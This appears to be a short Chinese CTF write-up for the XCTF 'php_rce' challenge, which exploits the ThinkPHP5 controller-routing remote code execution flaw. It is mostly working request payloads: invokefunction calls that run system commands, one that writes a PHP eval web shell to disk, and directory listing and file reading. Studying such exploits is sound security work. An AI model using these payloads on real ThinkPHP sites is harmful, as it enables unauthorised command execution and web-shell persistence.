2 3 4 5 6 7 8 9 10 11 12

php_rce xctf 攻防世界 web高手进阶区

没有题目描述

点击进入题目场景

漏洞描述:
由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接GetWebShell。

利用system函数远程命令执行

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

写入shell (想要了解其漏洞分析详情可看 https://blog.csdn.net/mochu7777777/article/details/104842420 ),该博主写了MVC框架,thinkphp的路由模式等详解

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST[cmd]);?^> >shell.php

这里就不具体分析了,写这题,先去查看其文件目录

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /

看到有flag,此时查看即可得到flag。

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

posted @ 2021-11-24 12:04  MrDevil  阅读(74)  评论(0)    收藏  举报